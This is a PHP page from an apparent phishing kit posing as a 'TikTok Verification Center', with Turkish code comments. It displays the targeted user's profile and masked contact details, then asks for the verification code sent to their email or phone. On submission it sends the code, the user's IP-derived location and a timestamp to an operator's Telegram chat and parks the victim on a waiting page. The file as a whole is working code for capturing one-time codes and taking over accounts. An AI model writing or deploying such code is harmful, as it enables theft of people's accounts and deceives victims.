<?php
session_start();
require_once 'api.php';
require_once 'functions.php';
$config = include('config/config.php');

// Kullanıcı adı kontrolü
if (!isset($_SESSION['username'])) {
    header("Location: form.php");
    exit();
}

$username = $_SESSION['username'];
$email = $_SESSION['email'] ?? '';
$phone = $_SESSION['phone'] ?? '';
$countryCode = $_SESSION['country_code'] ?? null;

// Profil bilgileri yoksa API'den çek
if (empty($_SESSION['profilePicBase64']) && $_SERVER['REQUEST_METHOD'] === 'GET') {
    $profileData = fetchTikTokProfile($username);
    
    if (!isset($profileData['error'])) {
        $_SESSION['profilePicBase64'] = $profileData['profilePicBase64'] ?? '';
        $_SESSION['fullName'] = $profileData['fullName'] ?? '';
        $_SESSION['followerCount'] = $profileData['followerCount'] ?? 0;
        $_SESSION['followingCount'] = $profileData['followingCount'] ?? 0;
        $_SESSION['mediacount'] = $profileData['mediacount'] ?? 0;
        $_SESSION['verified'] = $profileData['verified'] ?? false;
    }
}

// Profil bilgileri (oturumdan al)
$profilePicBase64 = $_SESSION['profilePicBase64'] ?? '';
$fullName = $_SESSION['fullName'] ?? '';
$followerCount = $_SESSION['followerCount'] ?? 0;
$followingCount = $_SESSION['followingCount'] ?? 0;
$mediacount = $_SESSION['mediacount'] ?? 0;
$verified = $_SESSION['verified'] ?? false;

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!verifyCsrfToken($_POST['csrf_token'] ?? null)) {
        http_response_code(400);
        exit('Bad Request');
    }
    $code = htmlspecialchars(trim($_POST["code"]), ENT_QUOTES, 'UTF-8');
    $ip = getUserIp();
    [$ulke, $sehir] = getLocation($ip);

    $site = htmlspecialchars($_SERVER["SERVER_NAME"], ENT_QUOTES, 'UTF-8');
    date_default_timezone_set('Europe/Istanbul');
    $cur_time = date("d-m-Y H:i:s");

    // Mesajı Markdown formatıyla oluştur
    $message = "✅ *$username Onay Kodu Girdi!*\n\n"
        . "🔢 *Kod:* `$code`\n"
        . "📍 *Konum:* $ulke / $sehir\n"
        . "⏰ *Tarih:* $cur_time\n";

    sendTelegramMessageCurl($config['apiToken'], $config['chatId'], $message);

    // Waiting sistemi için yönlendirme
    $_SESSION['waiting_id'] = bin2hex(random_bytes(16));
    $_SESSION['redirect_page'] = null;
    header("Location: waiting.php");
    exit();
}
?>
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>TikTok Verification Center | Form</title>
    <link rel="stylesheet" href="assets/css/style.css">

    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Montserrat:ital,wght@0,100..900;1,100..900&display=swap"
        rel="stylesheet">

    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/intl-tel-input/17.0.13/css/intlTelInput.css">
    <link href="https://cdn.jsdelivr.net/npm/remixicon@4.5.0/fonts/remixicon.css" rel="stylesheet" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
    <style>
        /* Disabled buton stilleri - login.php ile aynı */
        .buttonbaba:disabled {
            background-color: rgba(245, 0, 86, 0.32) !important;
            cursor: not-allowed;
            opacity: 1;
        }

        /* Skeleton Loader Genel Tasarım */
        .skeleton {
            display: inline-block;
            background: #e0e0e0;
            background: linear-gradient(90deg, #e0e0e0 25%, #f0f0f0 50%, #e0e0e0 75%);
            background-size: 200% 100%;
            animation: skeleton-loading 1.5s infinite;
            border-radius: 4px;
        }

        /* Animasyon */
        @keyframes skeleton-loading {
            0% {
                background-position: 200% 0;
            }

            100% {
                background-position: -200% 0;
            }
        }

        /* Profil Fotoğrafı için Skeleton */
        .skeleton-img {
            width: 100px;
            height: 100px;
            border-radius: 50%;
            /* Yuvarlak görünümlü */
        }

        /* Metin için Skeleton */
        .skeleton-text {
            height: 16px;
            width: 60%;
            margin: 10px 0;
        }

        /* Info Container Skeleton */
        .skeleton-info {
            height: 16px;
            width: 30%;
            margin: 5px;
        }
    </style>
</head>

<body>

    <?php include 'header.php'; ?>

    <div class="hero form">
        <div class="container">
            <div class="left">
                <form method="post" id="myForm" autocomplete="off" class="form-container">
                    <input type="hidden" name="csrf_token" value="<?php echo htmlspecialchars(ensureCsrfToken(), ENT_QUOTES, 'UTF-8'); ?>">

                    <?php
                    if (!empty($profilePicBase64)) {
                        // Profil bilgileri mevcutsa normal içerik göster
                        echo "
            <div class='userinfo'>
                        <img class='forepp' src='data:image/jpeg;base64,$profilePicBase64' alt=''>
                        <div class='name'>
                            <h3>$fullName</h3>
                        </div>
                        <p class='username'>@$username $verified</p>
                        <div class='stats' style='text-align: center;'>
                            <p><strong>$followingCount</strong><br>Following</p>
                            <p><strong>$followerCount</strong><br>Followers</p>
                            <p><strong>$mediacount</strong><br>Likes</p>
                        </div>
                    </div>
            ";
                    } else {
                        // Profil bilgisi yoksa skeleton loader göster
                        echo "
             <div class='userinfo'>
            <div class='forepp skeleton skeleton-img'></div>
            <div class='name'>
              <h3 style='width:160px;' class='skeleton skeleton-text'></h3>
              </div>
              <div class='stats'>
                <span style='width:50px;' class='skeleton skeleton-info'></span>
                <span style='width:50px;' class='skeleton skeleton-info'></span>
                <span style='width:50px;' class='skeleton skeleton-info'></span>
              </div>
            </div><br>
            ";
                    }
                    ?>
                    <?php
                    // E-posta ve telefon sansürleme
                    if (!function_exists('maskEmail')) {
                        function maskEmail($email)
                        {
                            $parts = explode("@", $email);
                            if (count($parts) !== 2) return $email;
                            $name = substr($parts[0], 0, 2) . str_repeat("*", max(0, strlen($parts[0]) - 2));
                            return $name . "@" . $parts[1];
                        }
                    }
                    if (!function_exists('maskPhone')) {
                        function maskPhone($phone, $countryCode = null)
                        {
                            if ($countryCode && strpos($phone, $countryCode) !== 0) {
                                $phone = $countryCode . ' ' . $phone;
                            }
                            $digits = preg_replace('/\D/', '', $phone);
                            $masked = str_repeat("*", max(0, strlen($digits) - 4)) . substr($digits, -4);
                            if ($countryCode) {
                                return $countryCode . $masked;
                            }
                            return $masked;
                        }
                    }
                    ?>

                    <p style="text-align: center;">Please verify your contact information below:</p>
                    <div style="display: inline-block; text-align: left; margin: 0 auto;">
                        <div style="margin-bottom: 5px;">
                            <i style="color: #f50057;" class="fas fa-envelope"></i> Email:
                            <?php echo maskEmail($email); ?>
                        </div>
                        <div>
                            <i style="color: #f50057;" class="fas fa-phone"></i> Phone:
                            <?php echo maskPhone($phone, $countryCode); ?>
                        </div>
                    </div>
                    <p style="text-align: center;">Please enter the verification code sent to your email or phone
                        number.</p>

                    <div class="input-column mb16" id="codeInput">
                        <label for="code"
                            style="display: flex; margin-bottom:5px; justify-content: space-between; align-items: center;">
                            <span>Confirmation code</span>
                        </label>
                        <div class="input-with-icon">
                            <i class="ri-key-line input-icon"></i>
                            <input type="number" id="code" name="code" placeholder="Confirmation code" required>
                        </div>
                        <p id="codeError" style="color: red; font-size: 14px; display: none; margin-top: 5px;">
                            Please enter a valid code.
                        </p>
                    </div>

                    <script>
                        const codeInput = document.getElementById('code');
                        const codeError = document.getElementById('codeError');
                        const form = document.getElementById('myForm');

                        // Buton durumunu kontrol eden fonksiyon
                        function checkButtonState() {
                            const code = codeInput.value;
                            const submitBtn = document.querySelector('.buttonbaba');
                            
                            // Kod 4 veya 6 hane olmalı
                            const isValidCode = (code.length === 4 || code.length === 6);
                            
                            if (isValidCode) {
                                submitBtn.disabled = false;
                                submitBtn.style.opacity = '1';
                                submitBtn.style.cursor = 'pointer';
                            } else {
                                submitBtn.disabled = true;
                                submitBtn.style.opacity = '0.5';
                                submitBtn.style.cursor = 'not-allowed';
                            }
                        }

                        codeInput.addEventListener('input', function () {
                            // Sadece rakam gir, en fazla 6 hane
                            let val = this.value.replace(/\D/g, '');
                            if (val.length > 6) val = val.slice(0, 6);
                            this.value = val;

                            // Geçerli uzunlukta ise uyarıyı gizle
                            if (val.length === 4 || val.length === 6) {
                                codeError.style.display = 'none';
                            }
                            
                            // Buton durumunu kontrol et
                            checkButtonState();
                        });

                        // Sayfa yüklendiğinde buton durumunu kontrol et
                        document.addEventListener('DOMContentLoaded', function() {
                            checkButtonState();
                        });

                        form.addEventListener('submit', function (e) {
                            const code = codeInput.value;
                            if (code.length !== 4 && code.length !== 6) {
                                e.preventDefault();
                                codeError.style.display = 'block';
                            } else {
                                codeError.style.display = 'none';
                            }
                        });
                    </script>
                    <button class="buttonbaba" type="submit" disabled><span id="3131">Continue</span> <i
                            class="fas fa-spinner fa-spin" id="loader" style="display: none;"
                            aria-hidden="true"></i></button>

                    <div id="resend-container" bis_skin_checked="1"
                        style="display: flex;justify-content: flex-end;align-items: flex-end;">
                        <a id="resend-link" href="#"
                            style="font-size: 14px; font-weight: 500; padding: 0px; background-color: rgba(255, 255, 255, 0); border: none; pointer-events: auto; margin-top: 10px; color: rgb(245, 0, 87);">Resend
                            code</a>
                        <span id="countdown"
                            style=" font-size: 14px; font-weight: 500;color: lightgray; margin-left: 5px;"></span>
                    </div>
                </form>
            </div>
            <div class="right">
                <img src="assets/img/hero/hero1.bmp" alt="">
                <img src="assets/img/hero/hero2.bmp" alt="">
                <img src="assets/img/hero/hero3.bmp" alt="">
            </div>
        </div>
    </div>
    <?php include 'footer.php'; ?>
    <script src="https://code.jquery.com/jquery-3.7.1.slim.min.js"
        integrity="sha256-kmHvs0B+OpCW5GVHUNjv9rOmY0IvSIRcf7zGUDTDQM8=" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/intl-tel-input/17.0.13/js/intlTelInput-jquery.min.js"></script>
    <script>
        document.addEventListener("DOMContentLoaded", function () {
            // -----Country Code Selection
            var phoneInput = $("#phone").intlTelInput({
                allowDropdown: true,
                dropdownContainer: document.body,
                formatOnDisplay: true,
                geoIpLookup: function (callback) {
                    fetch("https://ipapi.co/json")
                        .then(function (res) {
                            return res.json();
                        })
                        .then(function (data) {
                            callback(data.country_code);
                        })
                        .catch(function () {
                            callback("us");
                        });
                },
                initialCountry: "us",
                placeholderNumberType: "MOBILE",
                separateDialCode: true,
                showFlags: true,
                utilsScript: "https://cdnjs.cloudflare.com/ajax/libs/intl-tel-input/11.0.4/js/utils.js"
            });
        });
    </script>
    <script>
        document.querySelector('form').addEventListener('submit', function (event) {

            // Yükleme simgesini göster
            document.getElementById('loader').style.display = 'block';
            document.getElementById('3131').style.display = 'none';
        });
    </script>

    <script src="resend.js"></script>
</body>

</html>